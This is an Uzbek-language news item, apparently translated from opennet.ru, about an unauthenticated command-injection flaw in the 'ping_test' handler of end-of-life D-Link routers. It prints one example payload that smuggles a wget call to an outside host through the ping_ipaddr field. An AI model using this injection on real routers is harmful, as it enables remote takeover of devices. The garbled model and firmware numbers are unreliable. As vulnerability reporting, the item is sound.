D-Link simsiz routerlarida xavfli zaiflik (), bu sizga autentifikatsiya qilinmasdan kirish mumkin bo'lgan "ping_test" ishlov beruvchisiga maxsus so'rov yuborish orqali qurilma tomonida kodni masofadan bajarish imkonini beradi.
Qizig'i shundaki, proshivka ishlab chiqaruvchilarining fikriga ko'ra, "ping_test" qo'ng'irog'i faqat autentifikatsiyadan so'ng amalga oshirilishi kerak, lekin aslida u veb-interfeysga kirishdan qat'i nazar, har qanday holatda chaqiriladi. Xususan, apply_sec.cgi skriptiga kirishda va “action=ping_test” parametridan o‘tishda skript autentifikatsiya sahifasiga yo‘naltiriladi, lekin ayni paytda ping_test bilan bog‘liq amalni bajaradi. Kodni bajarish uchun ping_testning o'zida yana bir zaiflikdan foydalanilgan, u sinov uchun yuborilgan IP manzilining to'g'riligini to'g'ri tekshirmasdan ping yordam dasturini chaqiradi. Masalan, wget yordam dasturiga qo'ng'iroq qilish va "echo 1234" buyrug'i natijalarini tashqi xostga o'tkazish uchun "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://" parametrini ko'rsatish kifoya. test.test/?$( echo 1234)".
Zaiflikning mavjudligi quyidagi modellarda rasman tasdiqlangan:
- 655b3.02 yoki undan yuqori proshivkali DIR-05;
- 866b1.03 yoki undan yuqori proshivkali DIR-04L;
- 1565 yoki undan yuqori proshivkali DIR-1.01;
- DIR-652 (proshivkaning muammoli versiyalari haqida ma'lumot berilmagan)
Ushbu modellarni qo'llab-quvvatlash muddati allaqachon tugagan, shuning uchun D-Link , bu zaiflikni bartaraf etish uchun yangilanishlarni chiqarmaydi, ulardan foydalanishni tavsiya etmaydi va ularni yangi qurilmalar bilan almashtirishni maslahat beradi. Xavfsizlik yechimi sifatida siz veb-interfeysga kirishni faqat ishonchli IP manzillar bilan cheklashingiz mumkin.
Keyinchalik zaiflik ham borligi aniqlandi DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 va DIR-825 modellari, yangilanishlarini chiqarish rejalari hali noma'lum.
Manba: opennet.ru